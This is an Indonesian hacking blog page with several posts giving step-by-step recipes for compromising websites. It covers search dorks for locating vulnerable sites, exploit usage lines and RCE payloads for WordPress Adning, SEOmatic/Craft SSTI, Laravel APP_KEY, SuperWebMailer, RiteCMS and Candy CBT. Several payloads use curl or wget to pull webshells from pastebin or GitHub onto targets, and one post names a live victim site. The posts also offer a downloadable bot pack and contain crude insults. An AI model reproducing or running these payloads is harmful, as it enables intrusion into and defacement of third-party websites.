Welcome To Security Darknet

Selamat Datang Di Official Security Darknet

Rabu, 30 Desember 2020

WordPress Plugin Adning Advertising (AFU)

Comment

 


WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload 

Google Dork:
inurl:/wp-content/plugins/angwp

Toolsnya


Usage? python3 exploit.py http://target.com/ shell.php

Akses?

http://target.com/yourfile.php

Thnks to Endang Alfarisi

@ncdream72@gmail.com

Jumat, 30 Oktober 2020

Ngebot Stater Pack

1 Comment
kali ini gua akan membagikan sebuah tools pack / installer yang didalamnya ada banyak tools/bot. gw tau kalian kgak punya skill jadinya harus ngebot.

Isi didalam toolsnya, kurang lebih ada 20 tools, kalian cek aja sendiri. download disini http://www.mediafire.com/

Password : security-darknet.or.id

Jangan lupa share artikel nya juga ajg.

Contact : ncdream72@gmail.com
©security-darknet.or.id

Selasa, 27 Oktober 2020

(Server-Side Template Injection) + (RCE)

Comment

 


Deface Poc SSTI to RCE


(Server-Side Template Injection) +  (Remote Code Execution)

Exploit : /actions/seomatic/meta-container/all-meta-containers?uri=

RCE Code = 

{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}

Itu link pastebin nya bisa lu ganti ke punya lu

Nama file = x.php
Password = aryaganteng

dork : site:*/humans.txt intext:SEOmatic

Paham ga kontol

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri=

Kasih kode rce nya di belakang uri=
Seperti ini.

https://weblo.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}

Akses Shell
Site.com/namashell.php

Live Target :
https://www.shopmoment.com/actions/seomatic/meta-container/all-meta-containers?uri=

Lebih jelas lagi.
https://youtu.be/nGjv-P_hhHg

Contact : ncdream72@gmail.com

Laravel RCE APP_KEY

Comment

 Laravel RCE via Web Apps


2.Masukkan target (perhatikan penggunaan www,http,dan https)
3.Masukkan APP_KEY yang kalian dapat
4.Masukkan command (kalo saya seringkali dengan ls)
5.Klik exploit
Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini

*note:
Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel... 

Laravel RCE via terminal ( CLI )
download tools
php rce.php url=http://target.com/ method=1


Source : nakanosec
Contact : ncdream72@gmail.com

Unauthentication RCE SuperWebMailer

Comment

Unauthentication RCE SuperWebMailer


Dork :
inurl:/swm/defaultnewsletter.php

Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer

Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit


Oke pertama kita dorking dulu seperti biasa

Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php

jadi (https://sitelu.com/swm)


habis itu lu install tools nya gblk

pakek python3 ya itu jangan lupa

python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini


Habis itu command rce nya

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

Btw itu gua pakek mini shell karna shell tdi ga supp ama web w

Tinggal Akses dah
https://sitelo.com/swm/shell-v3.php

Contact : ncdream72@gmail.com

RiteCMS 2.2.1 - Authenticated Remote Code Execution

Comment


RiteCMS 2.2.1 - Authenticated Remote Code Execution

Vendor Homepage: http://ritecms.com/

Version: 2.2.1


Dork:

intext:"Powered By RiteCMS"


1- Go to following url. >> http://(HOST)/cms/

2- Default username and password is admin:admin. We must know login credentials.

3- Go "Filemanager" and press "Upload file" button.

4- Choose your php webshell script and upload it.

shell access?http://target.com/media/yourshell.php


Ref? Rite Cms


Contact : ncdream72@gmail.com

Deface PoC Computer Based Test RCE

Comment

 


Deface Poc Computer Based Test RCE


Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)

# Exploit #
-admin/ifm.php

jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php

Maka itu tandanya vuln.

# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'
Nama shell nya D.php bsa lu ganti sesuka hati lo

Akses Shell?
http://linktarget.com/files/namashell.php

contact : ncdream72@gmail.com

Langganan: Postingan (Atom)